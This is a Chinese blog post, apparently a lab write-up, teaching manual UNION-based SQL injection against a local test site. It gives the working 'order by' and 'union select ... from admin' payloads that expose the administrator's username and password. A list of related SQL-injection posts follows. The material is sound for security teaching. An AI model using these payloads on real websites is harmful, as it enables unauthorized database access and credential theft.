SQL注入原理--手工联合查询注入技术

最新推荐文章于 2024-06-05 14:13:37 发布
最新推荐文章于 2024-06-05 14:13:37 发布
阅读量7.9k 收藏 10
点赞数
文章标签: sql注入

**

实验目的:理解联合查询原理、学习联合查询过程

**实验原理:
1、链接后面添加【order by 11(数字任意)】根据页面返回结果,来判断站点中的字段数目

2、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】进行联合查询,来暴露可查询的字段编号
3、根据上一步得到的字段编号,查询语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】直接暴露管理员用户名和密码
实验环境:
本机:192.168.1.2
目标机:192.168.1.3

一、检测字段长度

1、随便点击一个链接http://192.168.1.3:8008/onews.asp? id=45,在后面添加语句【order by 11】,页面显示正常
这里写图片描述
2、同样添加【order by 12】页面报错,所以此站字段长度为11
这里写图片描述

二、暴露管理员用户、密码

1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3
这里写图片描述
2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码
这里写图片描述
3、到此,即可知道管理员用户名:admin和密码:bfpms

Unitue_逆流
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
SQL注入-02-注入步骤
xhxtalent的博客
11-24 1634
SQL注入的攻击步骤: 1、确认注入攻击目标网站 2、目标网站的一般信息的收集、分析与提取 3、网站技术分析:寻找和测试可用注入点,网页输入输出机制分析 4、探子回报:注入SQL确定数据库类型,当前账户权限级别 5、提权分析:根据用户级别确定是否可以与系统层交互提权,是否可以与数据库层交互提权,是否可以获取web后台管理员权限的可能性 6、网站可用SQL注入类型测试,盲注?显注? 7、盲注策略:使用注入分析工具替代人工 ​ 显注策略:第三者上位 攻击的准备–信息收集与分析 1.信念: 没有无用的信息 黑
分析SQL手工注入一般步骤
三朝看客
07-18 1939
首先,判断环境,寻找注入点,判断数据库类型,我们在前面的课程讲过。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌. 按参数类型主要分为下面三种: (1) ID=131 这类注入的参数是数字型,SQL语句原貌大致如下: Select * from 表名 where 字段=131 注入的参数为ID=49 And [查询条件],即是生成语句: Select * from 表名 where 字段...
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1445
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列名、存储过程等。
sql注入详解
最新发布
Cairo_A的博客
06-05 879
SQL注入是由于程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从 而产生SQL注入
SQL注入实验报告
热门推荐
fencecat的博客
12-31 1万+
实验项目 SQL注入 综合性实验 2020年9月25日 一、实验综述 1.实验目的及要求 创建VMWARE虚拟机 的Windows环境, 在虚拟机中安装phpstudy,并搭建DVWA环境,通过学习web工作原理SQL注入工作原理,能够实现简单的SQL注入验证。 2.实验仪器、设备或软件 Vmware DVWA phpStudy 3.实验原理 (1)Web工作原理: Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。 Web服务器的工作流...
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 643
简单介绍union联合注入原理、常用数据库名,以及一次简单的手工联合注入流程
01_SQL注入_Mysql注入利用联合查询手工注入
qq_42171569的博客
04-16 3845
01_SQL注入_Mysql注入:利用联合查询手工注入 1.SQL注入的成因 【严正声明】仅供学习,勿做他用!!! 【严正声明】仅供学习,勿做他用!!! 【严正声明】仅供学习,勿做他用!!! 遵纪守法,做合格网民!!!! 开发过程中,一些开发者会直接将URL的参数,POST方法的参数等一些列外来输入的参数拼接到SQL语句中。上述做法会造成SQL语句的可控,从而使得测试者能够通过执行SQL语句,实现一些自定义操作。 $id=$_GET['id']; $fp=fopen('result.txt','a');
sql注入手工注入示例详解
09-10
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的参数直接构造SQL查询语句时。手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(...手工注入漏洞测试(Db2数据库)、SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后...
SQL注入法攻击--手工注入
05-23
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统。这种攻击方式利用了应用程序处理用户输入数据时的不安全性,使得攻击者能够构造恶意的SQL语句,进而执行非授权的操作,获取、...
手工盲注辅助注入工具Blind-SQL-Injector.zip
07-18
2. **智能推理**:根据响应时间和页面内容的变化,自动推断出SQL语句的真假结果,帮助用户识别潜在的SQL注入点。 3. **多种注入技术**:支持基于时间的和基于布尔的两种盲注方式,以及更复杂的注入策略。 4. **...
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
同时,了解如何防御SQL注入至关重要,包括使用预编译的SQL语句、输入验证、参数化查询等方法,以防止恶意用户的入侵。 总之,SQL注入是Web应用安全的重要课题,通过实践这个实验,不仅可以增强对这种攻击的理解,还...
Mysql注入联合查询
一个普普通通的博客
03-01 965
Mysql注入联合查询
SQL注入攻击(:联合查询注入
weixin_63650919的博客
02-29 1247
SQL注入攻击(SQL Injection)是一种常见的网络攻击手段,主要利用Web应用程序对SQL语句的输入验证不严格的漏洞,攻击者通过在输入框中输入特殊字符或SQL语句,欺骗应用程序,使其将输入的字符当成SQL语句的一部分来执行。通过这种方式,攻击者可以绕过应用程序的认证和授权机制,直接访问数据库中的敏感信息,或者执行恶意的SQL语句,导致数据库数据被破坏、泄漏或者被盗取。SQL注入攻击的原理主要是Web应用程序没有对用户输入的数据进行严格的验证和过滤,导致非法数据侵入系统。
关于mysql注入联合查询
jiangwnxu的博客
06-18 257
information_schema 中文名称系统数据库,即存放所有数据库的数据库;这列我们先用show databases;查看发现他就是第一个数据库use 我们选择进入我们的数据库当中查看当前表的数据结构,注意看这里有个schemata的数据表接下来我们desc查看一下这张表的结构desc 表明查看当前表的结构;我们看到敏感目录 schema——name;select 字段名 from 表明;意思是from从这个表中查找这个字段的所有信息。
SQL注入(一)之原理与检测
不秃头的程序Yang
03-21 1240
SQL注入攻击原理 01 注射式攻击的原理 注入产生的原因是接受相关参数未经处理直接带入数据库查询操作;注入攻击属于服务端攻击,他与操作系统、数据库类型、脚本语言类型无关 总之一句话: 注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。 02 sql注入攻击示例 01 查询IP 02 启动phpstudy 03 关闭magic_quotes_gpc 04 访问pikachu 05 查看源码 06 注入 二 经典OR漏洞 大家经常听到网站万能密码登录,今天我们就来分析分析万能
13-sql注入查询方式及报错盲注
qq_56414082的博客
03-29 566
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。Access暴力猜解不出的问题?
SQL注入联合查询注入
qq_45691294的博客
07-11 7332
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
SQL注入(查询注入
m0_61974571的博客
10-12 1732
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.csdn.net/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
SQL注入漏洞-手工注入
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员进行漏洞的修复和弥补。但是需要注意的是,在使用这些工具进行测试时,一定要严格遵守相关法律法规,不得滥用,以免造成不必要的损失和困扰。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值